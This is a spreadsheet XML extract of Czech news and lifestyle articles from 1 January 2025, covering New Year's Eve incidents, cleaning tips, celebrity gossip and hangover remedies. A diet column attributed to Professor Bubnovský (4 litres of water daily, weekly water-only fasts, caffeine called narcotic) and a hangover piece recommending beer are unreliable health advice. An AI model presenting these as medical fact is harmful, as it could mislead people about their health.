Šváb. O moc lépe se nevedlo mladému muži, který krátce po půlnoci na Moravském náměstí v Brně napadl svou expřítelkyni a s nožem v ruce vyhrožoval její kamarádce, která se jí snažila na zemi pomoci. Útočník skončil na služebně. „Je podezřelý z výtržnictví a nebezpečného vyhrožování,“ upřesnil Šváb. Ještě před půlnocí pak nezvládl jízdu na jednokolce v brněnské ulici Radlas mladý student, nedal přednost a střetl se s autobusem. Naštěstí vyvázl pouze se zraněním. Líbí se mi Autor: Ondřej Požár Autor person Ondřej Požár</t>
  </si>
  <si>
    <t>20250101_278_3694745769_fd811fbdab8f9f89cf6f.html</t>
  </si>
  <si>
    <t>fd811fbdab8f9f89cf6f</t>
  </si>
  <si>
    <t>Čištění oken vás nebaví? S těmito triky to zvládnete rychle a snadno</t>
  </si>
  <si>
    <t>Čištění oken vás nebaví? S těmito triky to zvládnete rychle a snadno čištění oken, myti oken, rádce Čištění oken je aktivitou, která někoho baví více, jiného méně. Pokud patříte spíše do druhé skupiny, vězte, že daná činnost může být natolik jednoduchá, že vám možná přestane vadit. Podle odborníků byste se měli vrhnout na čištění oken alespoň dvakrát do roka. To sice není zase tak často, nicméně pokud vás daná aktivita nebaví, i taková četnost nepotěší. Musíme přitom doplnit, že příliš nezáleží na tom, kde vlastně žijete. Vedle silnice může na sklech ulpívat prach a v přírodě např. pyl. Nečistoty ovšem bývají také zevnitř. Pravidelné čištění je tedy podstatné. Nemusíte přitom používat žádné syntetické čisticí prostředky, ale úplně si vystačíte s běžně používanými surovinami. Upozorňujeme: pokud chcete skutečně nejjednodušší způsob čištění skel, můžete si pochopitelně najmout firmu na úklid a mytí oken. Musíme ovšem doplnit, že takové řešení se vám poněkud prodraží. Raději se tedy do toho pusťte sami. Ještě než se do toho pustíte V prvé řadě byste měli být na čištění oken teoreticky dobře připraveni. Co byste tedy měli vědět, aby byla tato aktivita skutečně co nejjednodušší a zároveň co možná nejefektivnější? Předně byste měli zkontrolovat situaci za okny. Obvykle nabízí nejlepší podmínky pro mytí zataženo. Samozřejmě by nemělo pršet, na druhou stranu horský slunečný den může způsobit, že se bude čisticí prostředek příliš rychle odpařovat. Před zahájením prací si připravte vše potřebné. Veškeré vybavení byste měli mít po ruce. Zapomenout není vhodné ještě na jeden (mezi)krok. Vezměte si košťátko a vymeťte pavučiny a další nečistoty. Okna, skla i parapety by totiž měly být co nejčistší. Jednoduchý trik na čištění oken Takových triků může být hned několik. Mezi zajímavá řešení nepochybně patří použití běžných novin, které si lze jednoduše opatřit. Odebíráte-li denní tisk, máte vyhráno. Novinový papír je totiž hrubší a navíc bývá velmi savý. Nejenže tedy dokáže odstranit i odolnější nečistoty, ale zároveň okna rychleji vysuší. Navíc musíme doplnit ještě jednu skutečnost. Při výrobě novin se používá alkohol . Právě alkohol , resp. líh je přitom možné použít při mytí oken jako čisticí prostředek. K čištění oken lze využít i reklamní letáky Zdroj Shutterstock Ingredience pro domácí čistič oken Pokud se vám nechce používat noviny, zaměřte svou pozornost na utěrky z mikrovlákna, které jsou opakovaně použitelné. Využít je možné i stěrku. Hodit se vám budou rovněž rukavice, stejně jako lahvička s rozprašovačem, kterou naplníte čističem. Z čeho si jej můžete vyrobit? Alkohol – stačí smíchat několik kapek lihu s vlažnou vodou. Bílý ocet – univerzální pomocník v domácnosti. Na dva šálky teplé vody můžete použít zhruba čtvrt šálku bílého octa. Poměr ale může být i jiný. Vyzkoušejte, co u vás nejvíce funguje. Jablečný ocet – uplatnění může nalézt i tato varianta octa. Kyselina citrónová – zcela bez překvapení je obsažena v citrusových plodech. Funguje přitom i při čištění oken. Mycí prostředek na nádobí – k dispozici máte i přírodní varianty, které bývají velmi účinné. Voda a bílý ocet v lahvičce s rozprašovačem Zdroj Shutterstock Tip na výrobu domácího čističe oken Na závěr pro vás máme ještě tip na domácí prostředek na čištění oken, který může být velmi účinný. O většině surovin pro jeho výrobu jsme se již zmínili výše. Co budete potřebovat? 2 šálky (vlažné) vody ½ šálku bílého či jablečného octa ¼ šálku 70% lihu 2 kapky přírodního mycího prostředku na nádobí Jednotlivé ingredience smíchejte a nalijte do lahvičky s rozprašovačem. Následně nastříkejte na okna, nechte nějakou dobu působit a setřete (třeba za pomoci novin). Určitě použijte rukavice, abyste zabránili vysoušení pokožky. Tip na závěr: pokud chcete, aby měl vámi vytvořený čistič pěknou vůni, můžete do něj nakapat rovněž jednu až dvě kapky svého oblíbeného esenciálního oleje. Zdroje: Southern Living, Good Housekeeping, Kärcher Autor: Petr Šindelář Autor person Petr Šindelář</t>
  </si>
  <si>
    <t>6510</t>
  </si>
  <si>
    <t>20250101_279_3694776888_b4dc57a52a0ea08c8e26.html</t>
  </si>
  <si>
    <t>b4dc57a52a0ea08c8e26</t>
  </si>
  <si>
    <t>Silvestrovská noc na Vysočině: ve Stojčíně hořely přístřešky na zahradě domu</t>
  </si>
  <si>
    <t>Silvestrovská noc na Vysočině: ve Stojčíně hořely přístřešky na zahradě domu Po sedmé hodině večer vyjížděli na Silvestra hasiči do Stojčína na Pelhřimovsku . Čtyři jednotky tam v poslední loňskou noc bojovaly s požárem dvou volně stojících přístřešků na zahradě rodinného domu. „Plameny za sebou zanechaly škodu v předběžné výši čtyři sta tisíc korun,“ sdělila policejní mluvčí Petra Musilová. Při požáru ani samotném zásahu se nikdo nezranil. Příčinou byla podle hasičů nedbalost při ukládání popela. Vyjíždět o silvestrovské noci museli hasiči ještě k dalším třem požárům. Ve Žďáru nad Sázavou zasahovali hasiči před půl jednou v noci u požáru plastového kontejneru. „Požár za sebou zanechal škodu 10 tisíc korun a zapříčinila jej nedbalost,“ uvedla mluvčí. Požáry krabic se zábavní pyrotechnikou likvidovali hasiči v Náměšti nad Oslavou a Jihlavě . Hasiči na Vysočině v noci ze Silvestra na Nový rok vyjížděli kromě požárů k dalším čtyřem událostem. V jednom případě šlo o planý poplach a dvakrát pomáhali zdravotníkům s transporty pacientů. „O půl třetí ráno jsme byli povoláni k dopravní nehodě osobního vozidla na komunikaci u obce Pořežín u Velké Losenice. Při nehodě se zranili dva lidé,“ doplnila mluvčí. Tři zranění od pyrotechniky Pernou silvestrovskou noc mají za sebou také vysočinští záchranáři. Během noční směny z 31. prosince 2024 na 1. ledna 2025 vyjeli záchranáři celkem k dvaašedesáti případům a ošetřili devětapadesát pacientů. Přímo s oslavami začátku nového roku vyjížděli třiadvacetkrát. „Nejčastějšími důvody našich výjezdů byly úrazy, kterých bylo celkem jedenáct. Ve třech případech jsme zasahovali u pacientů po fyzickém napadení. K intoxikaci alkoholem jsme vyjeli šestkrát, přičemž všichni pacienti byli transportováni do zdravotnického zařízení k dalšímu ošetření,“ vyjmenoval mluvčí ZZS Kraje Vysočina Petr Janáček. play_fill Jihlavsko Tři lidé se zranili při špatném zacházení s pyrotechnikou. „Jeden utrpěl poranění horní končetiny a dva poranění v obličeji. Tato zranění si vyžádala okamžitou zdravotnickou pomoc a transport do nemocnice,“ popsal mluvčí. Policisté na Vysočině od silvestrovského rána vyjížděli k více než stovce případů. „Pátrali po pohřešovaných osobách, přijímali oznámení o dopravních nehodách, spáchaných přestupcích a trestných činech, nálezu munice či v souvislosti s požárem, řešili situace, do kterých se dostali opilí lidé, konflikty a další události,“ uvedla policejní mluvčí Jana Kroutilová . Autor: František Vondrák Autor František Vondrák</t>
  </si>
  <si>
    <t>16830</t>
  </si>
  <si>
    <t>19290</t>
  </si>
  <si>
    <t>20250101_28_3701444318_8c42d0c35281bda6c522.html</t>
  </si>
  <si>
    <t>8c42d0c35281bda6c522</t>
  </si>
  <si>
    <t>Válka Rusko vs. Ukrajina</t>
  </si>
  <si>
    <t>Válka Rusko vs. Ukrajina Bělorusko o rok prodloužilo zákaz dovozu některého zboží z takzvaných nikoli přátelských zemí. Týká se mimo jiné dovozu z České republiky . S odkazem na usnesení Rady ministrů o tom informuje agentura TASS . Seznam zahrnuje některé výrobky z Česka , Lotyšska , Litvy , Polska a Estonska . Patří mezi ně pivo , fermentované nápoje, výrobky pro péči o pleť, vlasy, holení, ústní a zubní hygienu, deodoranty...</t>
  </si>
  <si>
    <t>20250101_280_3694718113_8c014998eb76fb160f95.html</t>
  </si>
  <si>
    <t>8c014998eb76fb160f95</t>
  </si>
  <si>
    <t>Profesor Bubnovský: Jak kvalitně zhubnout</t>
  </si>
  <si>
    <t>Profesor Bubnovský: Jak kvalitně zhubnout 1.1.2025 1,6K Profesor Bubnovský ( nar. 1955), autor mnoha knih o tělesném zdraví a způsobu jeho zachování či obnovy, vytvořil unikátní nový systém odstraňování bolesti a obnovení pracovní schopnosti bez operací a léků. Jeho metoda spojuje léčebnou a poradenskou péči se speciálním cvičením. Svou práci Bubnovský zakládá na vlastní zkušenosti – ve 22 letech utrpěl velmi těžká zranění a dlouhá léta se pohyboval o berlích, na rozsáhlém studiu – je absolventem dvou vysokých škol, doktorem lékařských věd a profesorem – a na bohatých zkušenostech z každodenní praxe. Je autorem mnoha patentovaných cvičebních postupů, pomůcek a trenažérů, umožňujících znovu získat bezbolestnou pohyblivost a zlepšit stav opěrného a pohybového aparátu včetně páteře. Lidé se mě často ptají, proč ve svých knihách nevěnuji žádnou pozornost správné výživě. Nejspíš jsem už moc městský člověk a navíc workoholik. Takoví lidé se obvykle stravují krajně nepravidelně a navíc nezdravě. Seznámil jsem se důkladně s dietologií a dost dlouho jsem držel diety nejrůznějšího druhu (mám dokonce osobní rekord – za tři měsíce 36 kg dole, tedy 12 kilo za měsíc), až jsem konečně dospěl k jedinému rozumnému závěru: k ničemu jinému než k neurózám, rozhození spánku, podrážděnosti, věčné únavě a osteochondróze diety nevedou a vést ani nemohou. Obecně mám za to, že zhubnout kvalitně, to znamená bez ztráty svalové hmoty, je možné pouze spojením různých aerobních zátěží, posilování a strečinku, to vše při racionální výživě. Mezi aerobní zátěže, které mohou hubnutí napomoci, řadím: obyčejnou chůzi – nejméně 2 hodiny rychlostí 6–8 km za hodinu (ve členitém terénu stačí i hodina) jogging 20–30 minut denně, s tepovou frekvencí 140–145 za minutu chůzi, respektive běh na lyžích, nejméně 3-5 km plavání 1,5–2 km bez přestávek, v maximálním tempu Dieta sama o sobě (samozřejmě kromě diabetické nebo diety žlučníkářů) je podle mého názoru škodlivá, protože spalovány jsou jako první především svaly, které jsou zásobárnou rychlé energie, nezbytné k udržení životní činnosti organismu. Teprve pak přijde na řadu tuková tkáň, která uchovává rezervní, tedy pomalou energii. Jako důsledek podobné snahy o dosažení ideální postavy pak vznikají dystrofická onemocnění typu osteochondrózy či artrózy a poruchy ischemické, spojené s cévní nedostatečností. Hubnout je proto třeba správně, protože i nesprávná strava napomáhá vzniku a vývoji osteochondrózy. Pokud jde o léčebné hladovky, mám k nim stejný vztah jako k lékům. Tedy pouze ve zvláštních případech a podle pokynů lékaře. Zásady racionální výživy, které dodržuje doktor Bubnovský: 1) jíst přirozené, nezpracovávané potraviny – ovoce, zeleninu, ořechy, vejce, obilniny, ryby, drůbež, králičí maso, mléko, sýr, tvaroh, jogurt 2) vyhýbat se konzervovaným potravinám 3) připravovat jídla maximálně ze 2-3 ingrediencí 4) vyhýbat se cukru a soli, nahrazovat je bylinkami nebo kořením, případně kořeněnými omáčkami – sůl dobře nahradí citronová šťáva nebo trocha sojové omáčky, rafinovaný cukr stévie, případně malé množství medu nebo sladkého ovoce 5) nepít alkohol – a už vůbec ne při jídle – a jako dezert si dát meloun nebo jablko 6) vyřadit kofein, protože uměle vybuzuje podráždění a vzrušení; často si vzrušení pleteme s čilostí, jenomže pár hodin po požití kofeinu se dostavuje únava a podrážděnost i bolesti hlavy. Tvrdím, že kofein je stimulující a přímo narkotický prostředek. Je fakt, že kávomani se mnou nesouhlasí. Krom všeho uvedeného je zcela nezbytné dodržovat správný pitný režim. Za den musíme vypít nejméně 3 litry vody. Já osobně dávám přednost hojnému napití hned ráno, ještě před cvičením (říkám tomu«vnitřní sprcha»), potom hned po něm, před jídlem a pak 1,5–2 hodiny po jídle. Pít je třeba hodně. Člověk se skládá z vody a čím častěji ji obměňujeme, tím lépe je na tom organismus. Nějaké balené šťávy, tím spíš pak sycené limonády jako jsou Coca-cola nebo Pepsi-cola, naprosto neuznávám. Nejlepší je obyčejná voda, ideálně samozřejmě pramenitá, z nějakého známého vrtu. Lidé, kteří trpí nemocemi a bolestem kloubů a osteochondrózou, musejí pravidlo správného pitného režimu dodržovat velmi přísně. Takže bez zásadní přeměny životního způsobu, který ke vzniku nadváhy a v jejím důsledku i osteochondrózy vedl, pouhým držením nějakých módních diet se podle mého názoru podstatného snížení hmotnosti, zlepšení potíží pohybového aparátu ani korekce postavy dosáhnout nedá. Dieta Bubnovského: SNÍDANĚ A VEČEŘE Kaše: pohanková, pšeničná, ovesná, rýžová 1/2 hrnku vloček nebo zrnin na 2 hrnky vody. Zalijte vařící vodou a vařte 4-5 minut, dokud nepřejde var. Nesolit! + cibulka dožluta osmahlá na rostlinném oleji, nebo stříknutí sojové omáčky (místo soli) + jakákoli zelenina (nejraději čerstvá, třeba lehce zkropená olivovým olejem a citronovou šťávou). OBĚD Netučný tvaroh s džemem nebo medem, nízkotučné mléko (1,5 % ), případně kousek celozrnného tmavého chleba. Nebo Zeleninová polévka, netučná vařená ryba (treska, štika) + jakékoli obilniny nebo zeleninová příloha. Nebo Kuřecí prsa, + jakékoli obilniny nebo zeleninová příloha. Důležité! Mezi jednotlivými příjmy potravy musí být 5–6 hodin. Hodně pijte, nejméně 4 litry denně. Vodu nebo neslazený čaj pijte v pauzách mezi jídly. Jednou za týden vydržte celý den jen o vodě. Každý den: 2 hodiny rychlé chůze nebo 500 dřepů. Je to náročné, ale dá se to vydržet. Zároveň si tak vyzkoušíte vlastní vůli. ========= Autor: ProKondici.cz Rubrika transition_slide Hubnutí</t>
  </si>
  <si>
    <t>20250101_281_3701239543_9685b981da6bb5780925.html</t>
  </si>
  <si>
    <t>9685b981da6bb5780925</t>
  </si>
  <si>
    <t>Zkouška ohněm. Katedrála Notre-Dame povstala z popela jako fénix</t>
  </si>
  <si>
    <t>Zkouška ohněm. Katedrála Notre-Dame povstala z popela jako fénix Nový rok rovná se nový začátek. Staré věci hoří, ale některé z popela opět povstanou jako fénix. Nebo jako katedrála Notre-Dame . A někdy se v plamenech zrodí něco úplně nového. 1,5 milionu let př. n. l. Ilustrace Dominik Drábek Legenda říká, že ho Prometheus propašoval od bohů až k lidem v dutém fenyklovém stonku. Praxe ukazuje, jak boží věc oheň ve skutečnosti je. Startuje klíčová transformace lidské civilizace. Vydání Forbesu Nesmrtelní Koupit Teď Vaření či pečení potravy ulehčují prvním lidem trávení, a ti tak mají víc energie. Ohniště s jídlem se stávají mimořádně populárním místem k setkávání. A zástupcům rodu Homo u toho postupně rostou mozky. Rok 33 Ilustrace Dominik Drábek Proměnil vodu ve víno , probudil se po třech dnech v nějaké jeskyni. Mezi historiky z řad křesťanů i mimo ně panuje docela široký konsenzus, že Ježíš byl skutečnou historickou postavou. Jestli se mu povedlo i vstát z mrtvých, nevíme. Ale faktem je, že jeho smrt položila základy nejmocnějšího náboženství světa, jehož stoupenci si libují ve velkolepých katedrálách. Rok 1415 Ilustrace Dominik Drábek Kritika rozporu mezi církví žijící v bohatství a evangelii hlásajícími chudobu a pokoru se neodpouští. Mistr Jan Hus však raději zemřel, než aby popřel své učení. Z popela hranice u kostnických hradeb posléze povstává radikální hnutí, které postupně připraví církev o osmdesát procent jejího majetku v Čechách . O celé století později zažehnou stejné ideje náboženskou revoluci, jež zachvátí celou Evropu . Rok 1453 Ilustrace Dominik Drábek Enormní kanony osmanské armády pálily do hradeb nonstop pětapadesát dní. Konstantinopol padla a s ní i poslední pozůstatky byzantské říše. Temný středověk definitivně končí a plameny hořícího města zažehly něco nového… Zdejší učenci se přesouvají do italských států, kde i díky nim začíná zbrusu nová kapitola historie – renesance. Rok 1831 Ilustrace Dominik Drábek Zvoník od Matky Boží proslavil spisovatele Victora Huga po celém světě. Tragický příběh hrbáče Quasimoda, jeho opatrovníka Frolla a lásky obou mužů ke krásné tanečnici Esmeraldě je rámován jejich vztahy ke katedrále Notre-Dame . Více než dvacet let po korunovaci Napoleona císařem Hugův román vrací tou dobou chátrající katedrále zašlou slávu. Rok 1978 Ilustrace Dominik Drábek Kanadský rocker Neil Young nahrává v San Franciscu píseň My My, Hey Hey (Out of the Blue), která napřesrok otevře jeho sólové album Rust Never Sleeps. V jejím textu je i verš „raději shořet než vyhasnout“. Šestnáct let nato Kurt Cobain těmito slovy zakončí svůj dopis na rozloučenou. „Je to píseň o rock’n’rollu, ne o životě. Život toho nabízí mnohem víc,“ říká Young dnes. Rok 2011 Ilustrace Dominik Drábek Daenerys Targaryen by ráda usedla na Železném trůnu, ale nemá k tomu dostatečnou palebnou sílu. Od smrti jejího manžela Khala Droga na ni horda Dothraků hledí skrz prsty a jí zbývá už jen oddaný ser Jorah Mormont a tři mimořádně cenná vejce. Devatenáctého června HBO vysílá poslední díl první řady svého největšího seriálového hitu, který končí plameny a popelem, z nějž povstanou tři čerstvě vylíhlí draci. Rok 2024 Ilustrace Dominik Drábek Ve Francii se zrovna rozpadla vláda, ale Emmanuel Macron má důvod k úsměvu – skóroval na poli zahraniční politiky. Francouzský prezident se v Elysejském paláci sešel u jednoho stolu se svým ukrajinským i americkým protějškem. Oba je pozval na slavnostní znovuotevření katedrály Notre-Dame. Symbol Paříže i Francie pět let po ničivém požáru vstává z popela. Autor: Marek Tomanka Autor Marek Tomanka</t>
  </si>
  <si>
    <t>20250101_282_3694688496_b67a9acf49a26a73a2ec.html</t>
  </si>
  <si>
    <t>b67a9acf49a26a73a2ec</t>
  </si>
  <si>
    <t>Policisté v MSK na přelomu roku řešili stovky událostí, petardou se zranil mladík z Havířova</t>
  </si>
  <si>
    <t>Policisté v MSK na přelomu roku řešili stovky událostí, petardou se zranil mladík z Havířova V Moravskoslezském kraji proběhly silvestrovské oslavy bez výjimečných událostí. Policisté během noci na Nový rok zaznamenali nejvíce výjezdů mezi půlnocí a jednou hodinou ranní, přičemž řešili desítky oznámení týkajících se výtržností, majetkových trestných činů i událostí spojených s pyrotechnikou. Soňa Štětínská, mluvčí Policie ČR MSK: “Do silvestrovské půlnoci byl relativní „klid před bouří“, tedy žádný razantní nárůst přijatých oznámení na linku 158 nebo událostí, které by policisté řešili oproti běžnému dni. Situace se jako každoročně změnila úderem půlnoci. Pro představu: policisté řeší v průběhu roku za den přes 300 věcí, přičemž za prvních pět hodin roku letošního bylo zhruba 210 těchto výjezdů a reakcí. Rekordmanem byla první hodina - policisté řešili 75 událostí. Počet hovorů na tísňovou linku 158 je samozřejmě o poznání vyšší, v některých chvílích může býti až dvojnásobný, ale ne vše oznámené patří k řešení policii, anebo k jedné věci přijmou operátoři tísňové linky 158 na operačním středisku více hovorů. Spektrum oznámených věcí bylo opravdu široké. Policisté řešili případy výtržností i narušení veřejného pořádku, zaznamenali jsme fyzická napadání, jak v bytech, barech, restauracích i ve venkovním prostředí. Asi nepřekvapí, že v mnoha případech hrál svou roli alkohol . Máme hlášeny skutky majetkové, dále například i ztrátu všech dokladů. Kolem půlnoci a v prvních chvílích nového roku si prim v oznámeních na linku 158 držela jednoznačně volání ohledně rušení nočního klidu a používání pyrotechniky." Petr Andráško, mluvčí HZS MSK: "Na území kraje evidujeme od 31.12. 23:00 do 1.1. 2025 7:00 celkem 74 mimořádných událostí, z toho 58 požárů (16x pyrotechnika). Ve zmíněných 58 požárech jsou zahrnuty především požáry odpadních nádob (popelnice, kontejnery), odpadu, lesních porostů, křovin a travin, a další požáry, včetně těch způsobených zábavní pyrotechnikou." Policisté řešili samozřejmě část událostí v úzké součinnosti se zdravotníky, hasiči a strážníky městské policie – ať šlo o oblast veřejného pořádku, oznámení o podnapilých osobách, zahoření či škody způsobené pyrotechnikou. Soňa Štětínská, mluvčí Policie ČR MSK: “Asistovali jsme hasičům u několika desítek zahoření například popelnic, krabic od petard, živých plotů a tújí od rachejtlí. Vyjeli jsme také dnes kolem půl jedné ráno do Ostravy – Poruby , kde měla pod zaparkovaným vozidlem explodovat petarda a bylo vidět zadýmení. Na místě zasahovali právě kolegové hasiči. Automobil má poškození ve spodní části. Policisté se událostí zabývají. Kolegům z městské policie jsme zase předávali několik oznámení typu nález opuštěného psa nebo informaci o psovi, který spadl do díry a uvízl v ní. S kolegy zdravotníky jsme zase řešili případy, u kterých došlo ke zranění osob."</t>
  </si>
  <si>
    <t>20250101_283_3694713686_6cef11887fa0e30dfe5d.html</t>
  </si>
  <si>
    <t>6cef11887fa0e30dfe5d</t>
  </si>
  <si>
    <t>Hvězdné přešlapy v opojení alkoholu 2024: Řízení pod vlivem, ale i epické pády celebrit</t>
  </si>
  <si>
    <t>Hvězdné přešlapy v opojení alkoholu 2024: Řízení pod vlivem, ale i epické pády celebrit Justina Timberlakea zatkla policie Přehled fotografií Zavřít přehled fotografií Zavřít Francesca Eastwood upadla před Chateau Marmont. Zdroj: Roger / BACKGRID / Backgrid USA / Profimedia Camila Cabello při odchodu z halloweenské party Kendall Jenner v Chateau Marmont dvakrát spadla na zem. Zdroj: VEGAN / BACKGRID / Backgrid USA / Profimedia Camila Cabello při odchodu z halloweenské party Kendall Jenner v Chateau Marmont dvakrát spadla na zem. Zdroj: The Hollywood JR / BACKGRID / Backgrid USA / Profimedia Isla Fisher při odchodu z akce Chiltern Firehouse. Zdroj: TOT / Goff Photos / Profimedia Francesca Eastwood upadla před Chateau Marmont. Zdroj: Roger / BACKGRID / Backgrid USA / Profimedia Když hvězda Protivných sprostých holek Reneé Rapp odcházela z The Late Show se Stephenem Colbertem , měla problém stát na nohou. Zdroj: BACKGRID / Backgrid USA / Profimedia Justin Timberlake poté, co byl propuštěn z vazby. Zdroj: Profimedia.cz/ ČTK Justin Timberlake řídil pod vlivem alkoholu . Zdroj: Profimedia.cz/ ČTK Policie zveřejnila snímek známého zpěváka po zatčení. Zdroj: AFP PHOTO / SAG HARBOR POLICE DEPARTMENT Zpěvák poté, co strávil noc ve vazbě. Zdroj: Profimedia.cz/ ČTK Justin Timberlake řídil pod vlivem alkoholu . Zdroj: Profimedia.cz/ ČTK Francesca Eastwood upadla před Chateau Marmont. Zdroj: Roger / BACKGRID / Backgrid USA / Profimedia Camila Cabello při odchodu z halloweenské party Kendall Jenner v Chateau Marmont dvakrát spadla na zem. Zdroj: VEGAN / BACKGRID / Backgrid USA / Profimedia Camila Cabello při odchodu z halloweenské party Kendall Jenner v Chateau Marmont dvakrát spadla na zem. Zdroj: The Hollywood JR / BACKGRID / Backgrid USA / Profimedia Isla Fisher při odchodu z akce Chiltern Firehouse. Zdroj: TOT / Goff Photos / Profimedia Francesca Eastwood upadla před Chateau Marmont. Zdroj: Roger / BACKGRID / Backgrid USA / Profimedia Když hvězda Protivných sprostých holek Reneé Rapp odcházela z The Late Show se Stephenem Colbertem , měla problém stát na nohou. Zdroj: BACKGRID / Backgrid USA / Profimedia Justin Timberlake poté, co byl propuštěn z vazby. Zdroj: Profimedia.cz/ ČTK Justin Timberlake řídil pod vlivem alkoholu . Zdroj: Profimedia.cz/ ČTK Policie zveřejnila snímek známého zpěváka po zatčení. Zdroj: AFP PHOTO / SAG HARBOR POLICE DEPARTMENT Zpěvák poté, co strávil noc ve vazbě. Zdroj: Profimedia.cz/ ČTK Justin Timberlake řídil pod vlivem alkoholu . Zdroj: Profimedia.cz/ ČTK Rok 2024 přinesl nejen mnoho zábavy, ale i několik okamžiků, kdy si slavné tváře až příliš užívaly alkoholu . Ať už šlo o bujaré oslavy, tematické párty nebo nepříjemnosti jako je řízení v opilosti. Do problémů se dostal například zpěvák Justin Timberlake (43), který usedl za volant pod vlivem alkoholu . V roce 2024 si řada slavných osobností naplno užívala večírků. Avšak některé z nich zašly s alkoholem až příliš daleko. Do maléru se dostal třeba Justin Timberlake . Populární zpěvák byl v polovině června zatčen a několik hodin strávil ve vazbě. Hudebníka na newyorském Long Islandu zadrželi policisté pro podezření, že řídil pod vlivem alkoholu . Do stejných problémů se na konci roku dostala také česká herečka Vilma Cibulková . Řízení v opilosti má pro Vilmu Cibulkovou dohru. Dostala dvouměsíční podmínku Veselo bylo také kolem zpěvačky Camily Cabello . Ta se na konci října vydala na halloweenskou párty v Los Angeles v Chateau Marmont, kterou pořádala členka klanu Kardashianových Kendall Jenner. Camila vyrazila v kostýmu sexy zajíčka. Byla oblečená jako Regina George z filmu Protivný sprostý holky v bílém trikotu, králičích uších a černých punčochách. Večírek si náramně užila, avšak při odchodu se neudržela na nohou. Společně s kamarádkou zakopla a obě skončily na zemi. The full fall caught on camera, Camila Cabello and her assistant Tori leaving a Halloween party last night 😭 pic.twitter.com/7zRE40WFqc — Camila Cabello Daily (@TheCamilaDaily) November 1, 2024 Trable s alkoholem si užila také hvězda nové muzikálové adaptace Protivných sprostých holek Renée Rapp. Ta upadla v ulicích New Yorku poté, co vystupovala v pořadu The Late Show se Stephenem Colbertem . Při odchodu spadla, zatímco v ruce držela láhev šampaňského. Ačkoli sebou praštila o zem, láhvi se nic nestalo. Sama herečka pád brala s humorem, protože jak je vidět na fotografiích, smála se. Bouřlivé manželství Slováčka a Patrasové: Dáda se opila, Felix skončil na hotelu Začátek prosince byl výživný pro dceru slavného herce Clinta Eastwooda . Francesca Eastwood se zřítila na zem před Chateau Marmont v Los Angeles , když odcházela z bujarého večírku. Zakopla o nohu své kamarádky, když se snažila nastoupit do taxíku. Na zemi se válela v zářivě bílém overalu. Na všechny pády slavných se můžete podívat v galerii v úvodu článku. Vystudovala obchodní akademii. Redaktorské činnosti se věnuje od roku 2019. K redakci CNN Prima NEWS se připojila v červnu 2023. Horoskop vždy po ruce Odesláním formuláře souhlasíte s podmínkami zpracování osobních údajů Sdílejte článek Autor: FTV Prima</t>
  </si>
  <si>
    <t>134620</t>
  </si>
  <si>
    <t>20250101_284_3694687464_19f70b7ae2c58b51985e.html</t>
  </si>
  <si>
    <t>19f70b7ae2c58b51985e</t>
  </si>
  <si>
    <t>Jak se zbavit kocoviny: Co vám zaručeně pomůže, když je po alkoholu špatně?</t>
  </si>
  <si>
    <t>Jak se zbavit kocoviny: Co vám zaručeně pomůže, když je po alkoholu špatně? Oslavy spojené s koncem roku se jen těžko obejdou bez alkoholu . Silvestrovské veselí málokdo zvládne u jedné skleničky, a tak není překvapením, že jedním z nejčastěji vyhledávaných výrazů na Nový rok je „jak se rychle zbavit kocoviny“. V tomto článku jsme pro vás připravili několik osvědčených tipů, které opravdu fungují. Co v článku najdete Jaké jsou příznaky kocoviny a jak dlouho trvá Co pomáhá na kocovinu? Jak se zbavit bolesti hlavy při kocovině? Záchrana z lékárny Jak předejít kocovině Jaké jsou příznaky kocoviny a jak dlouho trvá Kocovina je lidové označení pro dočasný stav vedlejších příznaků nadměrného požití alkoholu . Zpravidla přichází ve chvíli, kdy přestaneme pít a trvá zhruba dalších 24 hodin. Délka trvání záleží na množství požitého alkoholu . Možná vás překvapí, že kocovina vrcholí ve chvíli, kdy hladina alkoholu v krvi klesne na nulu . Tělo je dehydrované a játra se musí poprat s odbouráváním alkoholu , proto nemají čas na přeměnu cukru, kvůli čemuž v těle chybí vitamíny a energie, kterou potřebujeme. Mezi nejčastější příznaky kocoviny patří: nechutenství, nevolnost , bolest hlavy, přecitlivělost na hluk a světlo, třes, ale může být doprovázena také střevními problémy a únavou . Po probuzení většina lidí cítí velkou žízeň a sucho v ústech. PeopleImages.com - Yuri A / Shutterstock.com Co pomáhá na kocovinu? Pijte vodu ! Tělo je dehydrované, proto mu dopřejte dostatek vody. Tuk obalí žaludek . Tučná jídla nebo silný vývar dodají tělu sílu a spraví chuťové pohárky. I když se to může zdát zvláštní, pivo mnoho lidí považuje za osvědčený vyprošťovák – a my souhlasíme. Zázvor nejen na chřipku . Nakrájejte zázvor na tenké plátky a zalijte ho horkou vodou, přidejte med a citron a máte zcela přírodní vyprošťovák proti kocovině. Perlivé nápoje s kofeinem. Sklenice vychlazené Coca-Coly s ledem vám udělá dobře. Na překyselený žaludek už naše babičky pily extra vychlazené mléko . Jak se zbavit bolesti hlavy při kocovině? Záchrana z lékárny Klasikou proti bolesti hlavy je růžová tabletka štěstí Ibalgin . V lékárnách se prodává lék Ataralgin – ten má v sobě relaxační složku, která uleví od bolesti hlavy, ale také celého těla. Šumivé tablety proti kocovině najdete v každé lékárně i supermarketu. Nejznámější je Vyprošťovák nebo Samaritan . fizkes / Shutterstock.com Jak předejít kocovině Před příchodem na večírek se dobře najezte. Nikdy nepijte na lačný žaludek . Pokud obalíte žaludek něčím mastným, alkohol se bude vstřebávat mnohem méně. Každou sklenku alkoholu zapijte sklenicí vody . Před tím, než začnete popíjet alkohol , si můžete z preventivních důvodů vzít také přípravek Anti Ethanol , který stojí v lékárnách zhruba 200 Kč a předchází obtížím po konzumaci alkoholu . Zdroj: Kupi.cz Diskuze Diskutovat jak na to nevolnost bolest hlavy párty kocovina alkohol Silvestr</t>
  </si>
  <si>
    <t>318700</t>
  </si>
  <si>
    <t>20250101_285_3694717789_128812a3963325413fba.html</t>
  </si>
  <si>
    <t>128812a3963325413fba</t>
  </si>
  <si>
    <t>Tipy slavných, jak přežít kocovinu: Beatu Rajskou napraví vývar od manžela, Pepa Vojtek radí nepít a meditovat</t>
  </si>
  <si>
